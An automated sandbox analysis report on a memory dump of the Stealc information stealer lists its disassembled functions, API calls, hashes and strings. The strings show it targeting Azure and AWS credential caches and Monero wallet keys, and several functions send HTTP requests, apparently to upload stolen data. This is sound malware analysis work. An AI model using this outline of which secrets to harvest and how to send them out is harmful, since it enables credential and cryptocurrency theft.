Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4017274736-974132213
Opcode ID: 6428623b9adfd33f8e212cdee92b1345d688e5ce6fd010786af3a683d1060911
Instruction ID: 6c50d1eefde79dc9db37c1c2bc144fd98fd87da5b4ab2512beb442fd0005b66f
Opcode Fuzzy Hash: 6428623b9adfd33f8e212cdee92b1345d688e5ce6fd010786af3a683d1060911
Instruction Fuzzy Hash: F84195759402186BCB14F7B0EC8BFED373CAB14700F044468FA85A60C2EEB597D99B92

Function 00CACEF0 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

Part of subcall function 00CB8B60: GetSystemTime.KERNEL32(?,007F4820,00CC05AE,?,?,?,?,?,?,?,?,?,00CA4963,?,00000014), ref: 00CB8B86

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CACF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00CAD0C7
RtlAllocateHeap.NTDLL(00000000), ref: 00CAD0CE
lstrcatA.KERNEL32(?,00000000,007FD628,00CC1474,007FD628,00CC1470,00000000), ref: 00CAD208
lstrcatA.KERNEL32(?,00CC1478), ref: 00CAD217
lstrcatA.KERNEL32(?,00000000), ref: 00CAD22A
lstrcatA.KERNEL32(?,00CC147C), ref: 00CAD239
lstrcatA.KERNEL32(?,00000000), ref: 00CAD24C
lstrcatA.KERNEL32(?,00CC1480), ref: 00CAD25B
lstrcatA.KERNEL32(?,00000000), ref: 00CAD26E
lstrcatA.KERNEL32(?,00CC1484), ref: 00CAD27D
lstrcatA.KERNEL32(?,00000000), ref: 00CAD290
lstrcatA.KERNEL32(?,00CC1488), ref: 00CAD29F
lstrcatA.KERNEL32(?,00000000), ref: 00CAD2B2
lstrcatA.KERNEL32(?,00CC148C), ref: 00CAD2C1
lstrcatA.KERNEL32(?,00000000), ref: 00CAD2D4
lstrcatA.KERNEL32(?,00CC1490), ref: 00CAD2E3

Part of subcall function 00CBA820: lstrlenA.KERNEL32(00000000,?,?,00CB5B54,00CC0ADB,00CC0ADA,?,?,00CB6B16,00000000,?,007F1348,?,00CC110C,?,00000000), ref: 00CBA82B
Part of subcall function 00CBA820: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA885

lstrlenA.KERNEL32(?), ref: 00CAD32A
lstrlenA.KERNEL32(?), ref: 00CAD339
memset.MSVCRT ref: 00CAD388

Part of subcall function 00CBAA70: StrCmpCA.SHLWAPI(00000000,00CC1470,00CAD1A2,00CC1470,00000000), ref: 00CBAA8F

DeleteFileA.KERNEL32(00000000), ref: 00CAD3B4

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 4a219d792d5e6feefeeb39db4a612694b98a8a3a77e1ef8d4a17c42f33536875
Instruction ID: f58d771d11ae746327df3007b544580dc3fe6f51e639a1261dc4f2a82028b707
Opcode Fuzzy Hash: 4a219d792d5e6feefeeb39db4a612694b98a8a3a77e1ef8d4a17c42f33536875
Instruction Fuzzy Hash: 97E11B71910109AFCB18EBA1DD96EEE7378AF14301F144168F547B70A1DE35BA09EB62

Function 00CA4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA47EA
Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA4801
Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA4818
Part of subcall function 00CA47B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
Part of subcall function 00CA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00CA4915
StrCmpCA.SHLWAPI(?,007FD3E8), ref: 00CA493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA4ABA
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00CC0DDB,00000000,?,?,00000000,?,",00000000,?,007FD458), ref: 00CA4DE8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00CA4E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00CA4E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00CA4E49
InternetCloseHandle.WININET(00000000), ref: 00CA4EAD
InternetCloseHandle.WININET(00000000), ref: 00CA4EC5
HttpOpenRequestA.WININET(00000000,007FD508,?,00801770,00000000,00000000,00400100,00000000), ref: 00CA4B15

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

InternetCloseHandle.WININET(00000000), ref: 00CA4ECF

Strings

", xrefs: 00CA4D33
------, xrefs: 00CA4C69
------, xrefs: 00CA4B28
------, xrefs: 00CA49BD
", xrefs: 00CA4BF2

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 2402878923-2180234286
Opcode ID: 2176c14d618c34e9cce688d9a1daa73e513fcfc09e7c9047346efdd56f9bfebb
Instruction ID: 7f57a25da6431477275263945b8b60b708af9d9ff31906a66085447d23eafda4
Opcode Fuzzy Hash: 2176c14d618c34e9cce688d9a1daa73e513fcfc09e7c9047346efdd56f9bfebb
Instruction Fuzzy Hash: 2912FA72910218AADB15EB91DCA2FEEB338BF15300F5041A9F14676491EF712F49EF62

Function 00CB8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

RegOpenKeyExA.KERNEL32(00000000,007FE138,00000000,00020019,00000000,00CC05B6), ref: 00CB83A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00CB8426
wsprintfA.USER32 ref: 00CB8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00CB847B
RegCloseKey.ADVAPI32(00000000), ref: 00CB848C
RegCloseKey.ADVAPI32(00000000), ref: 00CB8499

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Strings

%s\%s, xrefs: 00CB844D
- , xrefs: 00CB85A3
?, xrefs: 00CB837A

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 037177e79bd5ed8958b8dd782427753d7688f212c583c85472a188574eae49a9
Instruction ID: 7161e337edc9c6829eb73a10c2a83b911e7f8262a395814d870fc8b8aaf61bb3
Opcode Fuzzy Hash: 037177e79bd5ed8958b8dd782427753d7688f212c583c85472a188574eae49a9
Instruction Fuzzy Hash: 8681FA7191011CAFEB28DB54CC95FEAB7BCBB08700F008299F149A6180DF716B89DFA5

Function 00CA6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA47EA
Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA4801
Part of subcall function 00CA47B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00CA4818
Part of subcall function 00CA47B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00CA4839
Part of subcall function 00CA47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CA4849

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

InternetOpenA.WININET(00CC0DFE,00000001,00000000,00000000,00000000), ref: 00CA62E1
StrCmpCA.SHLWAPI(?,007FD3E8), ref: 00CA6303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CA6335
HttpOpenRequestA.WININET(00000000,GET,?,00801770,00000000,00000000,00400100,00000000), ref: 00CA6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CA63BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CA63D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00CA63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00CA646D
InternetCloseHandle.WININET(00000000), ref: 00CA64EF
InternetCloseHandle.WININET(00000000), ref: 00CA64F9
InternetCloseHandle.WININET(00000000), ref: 00CA6503

Strings

ERROR, xrefs: 00CA6407
ERROR, xrefs: 00CA64C9
GET, xrefs: 00CA637C

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3074848878-2509457195
Opcode ID: 23383991363202cb21e91c29fe2be45602bdd383a227630395f25f4bc8999fa8
Instruction ID: 821f2eaaa3100daacce27fe94924fdfee6ba5dcf93bc0311264cfc71ad0c4119
Opcode Fuzzy Hash: 23383991363202cb21e91c29fe2be45602bdd383a227630395f25f4bc8999fa8
Instruction Fuzzy Hash: 82716E71A00218AFDB24DFA1CC89FEE7778BB49704F148168F10A6B1D0DBB56A89DF51

Function 00CB5510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00CBA820: lstrlenA.KERNEL32(00000000,?,?,00CB5B54,00CC0ADB,00CC0ADA,?,?,00CB6B16,00000000,?,007F1348,?,00CC110C,?,00000000), ref: 00CBA82B
Part of subcall function 00CBA820: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA885

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CB5644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB56A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB5857

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Part of subcall function 00CB51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB5228

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

Part of subcall function 00CB52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CB5318
Part of subcall function 00CB52C0: lstrlenA.KERNEL32(00000000), ref: 00CB532F
Part of subcall function 00CB52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00CB5364
Part of subcall function 00CB52C0: lstrlenA.KERNEL32(00000000), ref: 00CB5383
Part of subcall function 00CB52C0: strtok.MSVCRT(00000000,?), ref: 00CB539E
Part of subcall function 00CB52C0: lstrlenA.KERNEL32(00000000), ref: 00CB53AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CB578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CB5940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00CB5A0C
Sleep.KERNEL32(0000EA60), ref: 00CB5A1B

Strings

ERROR, xrefs: 00CB5636
ERROR, xrefs: 00CB59FE
ERROR, xrefs: 00CB577D
ERROR, xrefs: 00CB5693
ERROR, xrefs: 00CB5849
ERROR, xrefs: 00CB5932

Memory Dump Source

Source File: 0000000E.00000002.2886787568.0000000000CA1000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00CA0000, based on PE: true

Associated: 0000000E.00000002.2886760338.0000000000CA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886820419.0000000000CBE000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886856854.0000000000CCB000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000CFA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D25000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D28000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D2F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D32000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D51000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D5D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D82000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000D8F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DAF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000DBE000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E45000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E65000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000E6B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2886893072.0000000000EEA000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000E.00000002.2887482505.0000000000EFC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_ca0000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: dc55ee61755c14214654976a3b69386013b32c46246f561887bdc9b8405e42f8
Instruction ID: d692b5450978ba25a32251e185c15fdbd5fdb348bd8573a1dc5599290a89b2e9
Opcode Fuzzy Hash: dc55ee61755c14214654976a3b69386013b32c46246f561887bdc9b8405e42f8
Instruction Fuzzy Hash: 6CE12F71910208AACB18FBA1DC96EFD737CAF54300F548128F556664D2EF356B0DEBA2

Function 00CA1310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00CA1327

Part of subcall function 00CA12A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00CA12B4
Part of subcall function 00CA12A0: HeapAlloc.KERNEL32(00000000), ref: 00CA12BB
Part of subcall function 00CA12A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00CA12D7
Part of subcall function 00CA12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 00CA12F5
Part of subcall function 00CA12A0: RegCloseKey.ADVAPI32(?), ref: 00CA12FF

lstrcatA.KERNEL32(?,00000000), ref: 00CA134F
lstrlenA.KERNEL32(?), ref: 00CA135C
lstrcatA.KERNEL32(?,.keys), ref: 00CA1377

Part of subcall function 00CBA740: lstrcpy.KERNEL32(00CC0AEF,00000000), ref: 00CBA788

Part of subcall function 00CBA9B0: lstrlenA.KERNEL32(?,00CC1110,?,00000000,00CC0AEF), ref: 00CBA9C5
Part of subcall function 00CBA9B0: lstrcpy.KERNEL32(00000000), ref: 00CBAA04
Part of subcall function 00CBA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 00CBAA12

Part of subcall function 00CBA8A0: lstrcpy.KERNEL32(?,00CC0AEF), ref: 00CBA905

Part of subcall function 00CB8B60: GetSystemTime.KERNEL32(?,007F4820,00CC05AE,?,?,?,?,?,?,?,?,?,00CA4963,?,00000014), ref: 00CB8B86

Part of subcall function 00CBA920: lstrcpy.KERNEL32(00000000,?), ref: 00CBA972
Part of subcall function 00CBA920: lstrcatA.KERNEL32(00000000), ref: 00CBA982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00CA1465

Part of subcall function 00CBA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00CBA7E6

Part of subcall function 00CA99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CA99EC
Part of subcall function 00CA99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CA9A11
Part of subcall function 00CA99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00CA9A31
Part of subcall function 00CA99C0: ReadFile.KERNEL32(000000FF,?,00000000,00CB02E7,00000000), ref: 00CA9A5A
Part of subcall function 00CA99C0: LocalFree.KERNEL32(00CB02E7), ref: 00CA9A90
Part of subcall function 00CA99C0: CloseHandle.KERNEL32(000000FF), ref: 00CA9A9A

DeleteFileA.KERNEL32(00000000), ref: 00CA14EF
memset.MSVCRT ref: 00CA1516

Strings

\Monero\wallet.keys, xrefs: 00CA138D
wallet_path, xrefs: 00CA1330
SOFTWARE\monero-project\monero-core, xrefs: 00CA1335
